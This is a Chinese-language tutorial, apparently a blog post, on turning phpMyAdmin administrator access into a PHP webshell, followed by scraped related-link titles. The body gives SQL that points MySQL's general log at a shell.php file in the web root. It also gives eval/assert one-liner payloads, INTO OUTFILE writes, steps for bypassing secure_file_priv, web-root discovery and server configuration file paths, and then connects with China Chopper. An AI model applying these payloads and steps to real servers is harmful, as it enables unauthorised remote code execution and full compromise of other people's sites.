前言:

phpmyadmin后台拿webshell的方法主要分为两个方法:

(1) 、通过日志文件拿webshell;

(2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难);

本地搭建环境:

Phpmystudy 2018

PHP--5.5.38

一、日志文件写入一句话来获取webshell:

(1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个日志文件重名为*.php,然后我们在执行一次sql语句,那么就会被保存在这个*.php文件中,这样我们就能顺利拿到webshell。

(2) 、假如通过某个方法获取到phpmyadmin的登陆后台且账号密码是弱口令:

(3)、点击变量选项,搜索gen就会出来general.log和general log file这两个变量,general.log变量是指是否启动记录日志;而general log file指的是日志文件的路径,可以看到general.log变量的状态为OFF,故我们要修改为ON;general log file变量中的*.log的后缀我们改为*php。拿完webshell记得要改回去哟。

SQL语句进行修改:

SET global general_log = "ON"; 日志保存状态开启;
SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/shell.php'; 修改日志的保存位置。

(具体路径还需在实际环境中改变);

修改后的配置

(4)保存后,我们在SQL查询的框中写入

select "<?php eval($_POST['cmd']);?>";
或着
SELECT '<?phpassert($_POST["cmd"]);?>';

执行完毕后就会出现这个界面,这样的话我们就成功的把一句话写入到日志文件中:

(5)、查看网站目录下生成了一个shell.php的文件,一句话木马已经被我们写入,看到这里大家可能会问为什么里面不是纯净的一句话木马?我也百思不得其解,百度了一下发现是我们是上传的php一句话木马,在连接过程中,它是从头开始读取的,因为前面的不具备php文件的特征:

(6)、浏览器测试

用菜刀直接连接木马地址,webshell成功拿到:

http://127.0.0.1/shell.php​

webshell已经拿到

二、利用插入一句话来提取webshell:

1、在知道路径的前提下插入一句话,

我们在插入一句话木马的时候首先要检测插入的条件是否被允许,输入查询语句

show global variables like '%secure%';

显示是NULL值,这样的情况下我们插入一句话是无法插入的,需要我们修改secure_file_priv=’’为空值才能插入一句话:

解释一下:

  • secure_file_priv为null 表示不允许导入导出;
  • secure_file_priv指定文件夹时,表示mysql的导入导出只能在指定的文件夹;
  • secure_file_priv没有设置时,则表示没有任何限制;

当secure_file_priv为null 时,执行插入语句,发现无法插入一句话木马:

select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'E:/phpStudy/PHPTutorial/WWW/shell.php';

意思是Mysql服务器运行“--secure-file-priv”选项,所以不能执行这个语句。

如果要解决这个问题,我们可以通过下面2种方式:将你要导入或导出的文件位置指定到你设置的路径里;由于不能在网页上修改,所以我们只能修改my.cnf里关于这个选项的配置,然后重启即可。(windwos下my.cnf叫my.ini)我的在E:\phpStudy\PHPTutorial\MySQL路径下

把--secure-file-priv修改为'' 没有这个则添加。

(1)、当我们把上面的障碍扫平之后,接下来就比较简单,我们可以这样写:

select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'E:/phpStudy/PHPTutorial/WWW/shell.php';

意思就是在目录下会生成一个shell.php的文件,我们用菜刀直接连接这个文件地址就可以直接拿到webshell:

(2)、我们用菜刀直接连接http://127.0.0.1/shell.php就可以成功拿到服务器webshell:

2、在不知道绝对路径的前提下拿webshell:

这个方法几乎和我们做灰盒测试差不多,只拿到了登陆后台,但是不知道网站的绝对路径,这就非常尴尬,下面我总结了一下几点可以成功爆出网站的根路径:

(1)、SQL查询框中输入select @@basedir;就可以成功的输出绝对路径,这是利用了mysql的特性;(这个比较常用,毕竟是mysql的特性)

select @@basedir;

(2)、直接在url后面输入phpinfo.php,看看能不能读出这个文件,如果存在就会把网站的绝对路径显示出来,这样的情况特少,因为网站管理人员不可能把这个测试页面在互联网上面直接显示出来,他们或许会更改路径或许会设置目录访问权限;

(3)、使用扫描工具对网站进行扫扫描;扫描一些phpinfo.php info.php php.php test.php等等;

(4)、phpmyadmin读取 iis6,iis7配置文件 读取apache Nginx 配置文件!

  • windows2003 iis6配置文件所在位置          C:\Windows/system32\inetsrv\metabase.xml
  • win2008/2012 iis7.5 在这个文件       C:\Windows\System32\inetsrv\config\applicationHost.config
  • Nginx配置          /etc/nginx/conf.d/vhost.conf     /etc/nginx/nginx.conf
  • apache配置        /etc/httpd/conf/httpd.conf         /usr/local/apache2/conf/httpd.conf

总结

1、利用日志写shell

SET global general_log = "ON"; 日志保存状态开启;
SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/shell.php'; 修改日志保存的位置
SELECT "<?php eval($_POST['cmd']);?>";

2、利用 select XXX into outfile 绝对路径写shell(需要secure_file_priv='')

select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'E:/phpStudy/PHPTutorial/WWW/shell.php';

3、查找绝对路径

select @@basedir;

PhpMyadmin后台拿webshell方法总结的更多相关文章

  1. 在phpmyadmin后台获取webshell方法汇总整理

    方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma ...

  2. 后台拿webshell方法(2)

    在这里总结一下后台拿webshell的方法: 备份突破(在博客上有随笔介绍) 一般在后台上传文件类型受到限制,可以利用数据库备份将其上传的格式改为后门执行格式即可: asp更改为jpg     jpg ...

  3. phpmyadmin后台拿shell方法总结

    方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma ...

  4. KesionCMS V6.5后台拿SHELL方法

    Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21 最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下 ...

  5. 获取Webshell方法总结

    一.CMS获取Webshell方法 搜索CMS网站程序名称 eg:phpcms拿webshell.wordpress后台拿webshell 二.非CMS获取Webshell方法 2.1数据库备份获取W ...

  6. Java类WebServer及中间件拿webshell方法总结

    0.序 原文名称:Tomcat.Weblogic.JBoss.GlassFish.Resin.Websphere弱口令及拿webshell方法总结 原文from:http://www.hack80.c ...

  7. 利用SQL注入漏洞登录后台的实现方法

    利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读 ...

  8. JQuery EasyUI弹出对话框解决Asp.net服务器控件无法执行后台代码的方法(转)

    原文:JQuery EasyUI弹出对话框解决Asp.net服务器控件无法执行后台代码的方法 jquery-easyui是一个基于jquery的图形界面插件,利用easyui可以创建很多好看的网页界面 ...

  9. iOS设备后台播放音乐方法

    iOS设备后台播放音乐方法 1 在设置Capabliites中打开Background Modes,选择Audio And AirPlay 2 在控制viewDidLoad中添加下面代码 AVAudi ...

随机推荐

  1. pytest(7)-yield与终结函数

    通过上一篇文章,我们已经知道了pytest中,可以使用Fixture来完成运行测试用例之前的一些操作如连接数据库,以及测试执行之后自动去做一些善后工作如清空脏数据.关闭数据库连接等. 我们已经学会了f ...

  2. netty系列之:不用怀疑,netty中的ByteBuf就是比JAVA中的好用

    目录 简介 ByteBuf和ByteBuffer的可扩展性 不同的使用方法 性能上的不同 总结 简介 netty作为一个优秀的的NIO框架,被广泛应用于各种服务器和框架中.同样是NIO,netty所依 ...

  3. Nginx--Sorry, the page you are looking for is currently unavailable

  4. Oracle数据库-常规中行显示0,解决方案

    如图,如果当前位置显示为0  原因:Oracle不是实时的对表进行分析的,需要手动执行分析. 解决方案: 分析表 analyze table tablename compute statistics;

  5. 关于oracle中(+)的运用

    一.基础 1.1 SQL查询的基本原理 第一.单表查询:根据WHERE条件过滤表中的记录,形成中间表(这个中间表对用户是不可见的):然后根据SELECT的选择列选择相应的列进行返回最终结果.第二.两表 ...

  6. 超简单集成 HMS ML Kit 实现最大脸微笑抓拍

    前言 如果大家对 HMS ML Kit 人脸检测功能有所了解,相信已经动手调用我们提供的接口编写自己的 APP 啦.目前就有小伙伴在调用接口的过程中反馈,不太清楚 HMS ML Kit 文档中的 ML ...

  7. NSSCTF-gif好像有点大

    下载的附件压缩包是一个接近9mb的压缩包,其实是比较简单的一个小杂项,应该就算是个签到,接下来就是使用工具进行解答,可以使用LSB隐写工具,一帧一帧的查看,最后是在500多看到的一个是存在二维码的,扫 ...

  8. 思科VTP协议(后面有配置案例)

    一.VTP相关理论介绍 1.1 VTP(VLAN trunking protocol)协议是用来在整个交换网络中分发和同步VLAN数据库的,是一个二层协议,思科私有协议. 1.2 VTP域是由一台或者 ...

  9. 可视化BI软件为企业提升数据分析效率

    ​可视化BI软件经过几十年的不断发展,已成为大型企业进行商业决策不可缺少的工具.在BI软件问世之前,由于做数据分析可视化的时间较长.人力成本较高,企业一直处于忽视的状态.可视化BI软件的出现极大地提高 ...

  10. 2021年国内BI厂商推荐_大数据分析工具

    随着互联网大数据时代的不断发展,BI让企业的工作效率变得更高效.BI的功能也随着需求的增长不断地丰富,例如,数据可视化大屏.可视化表格.商业化数据分析.数据地图等.国外的厂商在很多场景下无法满足国内的 ...